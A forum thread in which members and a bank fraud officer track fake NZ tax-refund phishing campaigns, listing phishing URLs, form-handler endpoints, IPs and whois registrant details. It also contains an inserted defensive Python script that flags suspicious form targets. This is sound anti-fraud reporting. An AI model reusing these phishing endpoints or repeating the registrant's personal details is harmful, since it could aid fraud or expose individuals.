IRD warns of fake tax email

Phishing scams, hijacking of TM accounts, keyloggers and all manner of other nasties. This is the place to report them and get help if you've been hit.
Rob@BNZFraud
Members
Posts: 5
Joined: Thu Dec 30, 2010 9:19 pm
First Name: Rob

Re: IRD warns of fake tax email

Post by Rob@BNZFraud » Thu Dec 30, 2010 10:05 pm

Hi all,

Peter and I spoke earlier in regards to this issue and I thought it best to log on and say hi. As I mentioned to Peter, we have been aware of this scam for some time and have been monitoring the same information posted earlier in this thread for about a day now.

That said, big thanks to Peter and all of you for actually doing something about this scam! We love having allies in the community, especially those with technical knowledge and a bit of drive to make the world a better place. If we hadn't already been aware of this issue, Peter's call would have been even more warmly received.

I would make one request though. Could one of the admins please edit the cardholders' personal details/card numbers out of this thread and also remove the link to the source of this information? I don't mean to be a wet blanket, but the privacy implications of having cardholder details exposed in public are obvious, and while I'm certain that no members of this website would use these details for less-than-honorable purposes, having this data duplicated in as few places as possible would make us all feel a little more relaxed. We have already taken steps to restrict transactions on the accounts in question, so really just trying to cover all bases.

Many thanks,

Rob @ BNZ Fraud

EDIT: The file has disappeared :( If anybody finds out the new location it is stored at, please PM me. You can also call 0800 933 399, which will come through to the Fraud team.

digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago

Post by digidog » Fri Dec 31, 2010 2:11 am

Hi Rob, it's always nice to get some feedback and encouraging to find that someone in authority is actually taking action against this sort of scam. We've contacted banks in the past about phishing scams and found they're not really that interested.

While the text file of victims appears to be missing in action, have a poke around the other directories on the scam site. There are still forms waiting to be used in their next scam.

And I've removed all of the victims' personal details as requested.

Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt

Re: IRD warns of fake tax email

Post by Foggyone » Fri Dec 31, 2010 2:51 am

This is not the first IRD scam.

The last one used an attachment as a form (which I still have), with submission going straight to the form handling script in a compromised site. Much harder to stop as there is unlikely to be a browser warning of impending doom.

Scammers are smart in finding ways to relieve folks of their hard earned!
Google, the answer to so many questions!
-----------------------------------------------------

abc
Members
Posts: 4
Joined: Wed Dec 29, 2010 9:27 pm
First Name: Josh

Re:

Post by abc » Sat Jan 01, 2011 9:02 pm

digidog wrote: While the text file of victims appears to be missing in action, have a poke around the other directories on the scam site. There are still forms waiting to be used in their next scam.

http://216-31-226-228.static-ip.telepacific.net/ doesn't load at all for me?

digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago

Re: Re:

Post by digidog » Sat Jan 01, 2011 9:53 pm

abc wrote:... doesn't load at all for me?
It's very slow loading but two directories containing phishing files are still online. If you are viewing any files there be careful. The file process.php starts opening multiple windows!

ionet
Members
Posts: 2160
Joined: Fri Feb 18, 2005 2:33 pm
Location: Hawkes Bay

Re: IRD warns of fake tax email

Post by ionet » Sun Jan 02, 2011 2:53 am


My gut feeling is that although a Russian based or hosted phishing site has been mentioned, this chapter of IRD phishing & identity theft scams might in fact be Romanian originated instead :?:

The Scammers after all have a long established database of contacts from NZ Auction site scams & account takeovers, notably on Trade Me originating back to at least 2006.

For Trade Me users to be receiving emails suggests what ?

The scam appears to be very much focused on NZ web users and perhaps DIICOT have some further Romanian tidy up work to do in their local camp after their joint FBI clean up during mid-2010 fixed an eBay problem ?


M
Ultimate Auction Security: Kick 'em in the pants & sweep them under the carpet fast before anyone sees & hope they go away.

Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt

Re: IRD warns of fake tax email

Post by Foggyone » Wed Jan 05, 2011 9:28 pm

The latest phish has been sent to me. This involves an HTML attachment that opens with the standard phish form.

Form goes to <FORM action="http://wjutw2.com/process.php" method="post" name="date" autocomplete="off"> for form processing.

Whois

Admin Name........... Peggy Green
Admin Address........ 777 cherrytree rd apt g113
Admin Address........
Admin Address........ aston
Admin Address........ 19014
Admin Address........ pa
Admin Address........ UNITED STATES
Admin Email.......... greenpeggy98@yahoo.com
Admin Phone.......... +1.4031923912
Admin Fax............

Appears to be an empty domain at present.

digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago

Post by digidog » Thu Jan 06, 2011 9:08 pm

Here's news of a variation of the scam - using taxrefunds.co.nz as the bait.

http://www.stuff.co.nz/national/crime/4 ... email-scam

Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt

Re: IRD warns of fake tax email

Post by Foggyone » Sun Jan 09, 2011 4:03 am

Latest IRD phish hot off the web.

This comes with a link to http://melaka.rmp.gov.my/a/ird.govt.nz/ ... /form.html

There are also two more links in this site as below.
http://melaka.rmp.gov.my/b/ird.govt.nz/ ... /form.html

http://melaka.rmp.gov.my/c/ird.govt.nz/ ... /form.html

The form is in a frame, and points to http://221.151.55.226/nz1/process.php. This directory contains

[TXT] d1n.txt 09-Jan-2011 12:14 10
[ ] process.php 09-Jan-2011 11:15 953
[TXT] refundForm.htm 09-Jan-2011 11:14 24K

d1n.txt is empty as at this time.
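The two attachments described in this thread (the HTML form posting straight to wjutw2.com/process.php, and the framed form whose lure URL carries ird.govt.nz in the path of an unrelated host) share the same tells, so here is an added triage script, written for this thread rather than taken from any post or project, that pulls form actions and frame sources out of such an attachment and flags those tells. The sample HTML is constructed; the frame host compromised.example is a placeholder, and only the wjutw2.com form tag is quoted from the thread.

```python
"""Triage an HTML phishing attachment: find where the form really posts.

Constructed example (not code from the forum). Standard library only.
Looks for the two tells discussed in the thread:
  1. a <form action> or <frame>/<iframe src> pointing at a host that is
     not the organisation the page claims to be (here ird.govt.nz);
  2. a URL that carries the trusted domain in its *path* while the host
     is something else (the melaka.rmp.gov.my/.../ird.govt.nz/ pattern).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED = "ird.govt.nz"   # the brand the lure impersonates (from the thread)


class PhishFormParser(HTMLParser):
    """Collect form actions and frame sources from an HTML attachment."""

    def __init__(self):
        super().__init__()
        self.targets = []          # list of (tag, url)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)            # HTMLParser lowercases tag/attr names
        if tag == "form" and a.get("action"):
            self.targets.append(("form", a["action"]))
        elif tag in ("frame", "iframe") and a.get("src"):
            self.targets.append((tag, a["src"]))


def classify(url, trusted=TRUSTED):
    """Return the findings for one URL; an empty list means nothing odd."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    findings = []
    if host and host != trusted and not host.endswith("." + trusted):
        findings.append("target host %s is not %s" % (host, trusted))
    if trusted in p.path.lower():
        findings.append("trusted domain appears in the path, not the host")
    return findings


def triage(html, trusted=TRUSTED):
    """Map every form/frame target found in `html` to its findings."""
    parser = PhishFormParser()
    parser.feed(html)
    return {url: classify(url, trusted) for _, url in parser.targets}


# Constructed sample: the form tag quoted in the thread plus a placeholder
# frame whose path embeds the brand domain the way the lure URLs did.
SAMPLE = """<html><body>
<FORM action="http://wjutw2.com/process.php" method="post" name="date" autocomplete="off">
<input name="cc"></FORM>
<iframe src="http://compromised.example/a/ird.govt.nz/form.html"></iframe>
</body></html>"""

if __name__ == "__main__":
    for url, notes in triage(SAMPLE).items():
        print(url, "->", "; ".join(notes) or "ok")
```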

Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt

Re: IRD warns of fake tax email

Post by Foggyone » Sun Jan 09, 2011 11:24 pm

This site was flagged as a web forgery this morning. It is not showing as such at work (may be an out of date browser).

I see the txt file is collecting again (it was missing entirely this morning). I believe the scammer has revamped this completely as the look today is quite different, as is the information requested. Today the extra details are cc number and cc limit. Also the bank. This is now an extensive identity theft with data checking built in (including DL check and CC validity check), a much more sophisticated attempt.

Advised our BNZ contact of the fact that it was alive and well now.

Rob@BNZFraud
Members
Posts: 5
Joined: Thu Dec 30, 2010 9:19 pm
First Name: Rob

Re: IRD warns of fake tax email

Post by Rob@BNZFraud » Sun Jan 09, 2011 11:51 pm

Thanks for the heads-up Peter. Will get the information out to the other banks now. It seems the fraudsters have just gone back to work today with everyone else, so have been a touch busy. ;-)

Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt

Re: IRD warns of fake tax email

Post by Foggyone » Mon Jan 10, 2011 7:58 am

This is a really interesting ongoing phish.

The "a" address above is still operating with the updated phish. Earlier today this was showing as a web forgery.

The "b" listing is currently showing as a web forgery.

The "c" address is operating normally, with the updated phish.

The phish page is downloading from IP 210.117.136.82 which is a Korean IP. There does not appear to be much activity with the d1n.txt file, and I suspect the information may now be being diverted to the Korean address. In any event the address where this is stored is currently being flagged as a web forgery.

The phish page is also very interesting, with obfuscated javascript, as is the php file. All in all, very strange how it continues to operate.

Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt

Re: IRD warns of fake tax email

Post by Foggyone » Tue Jan 18, 2011 7:18 pm

The latest IRD phish has arrived. It points to http://d41buc.com/processor.php and the refund amount promised is a paltry $84.00.

The form is handled by an attached HTML file.

Rob advised

Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt

Another One

Post by Foggyone » Sun Jan 23, 2011 11:30 pm

Text supplied as an image from http://img508.imageshack.us/img508/3940/73942797.png

Sending IP 209.55.199.93 is (oops!)

OrgName: Coca-Cola Enterprises, Inc.
OrgId: COCACO-3
Address: P. O. Box 723040
City: Atlanta
StateProv: GA

The form is an attachment (again) to make it harder to track down the receiving file, which is at http://ngu21s.com/.
The receiving file is processor.php, which is the same name as before. Unable to access the file of accumulated phishes.

digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago

Post by digidog » Mon Jan 24, 2011 12:15 am

The ngu21s.com site was only registered three days ago, for this specific purpose you'd imagine. The registrant details are probably bogus.
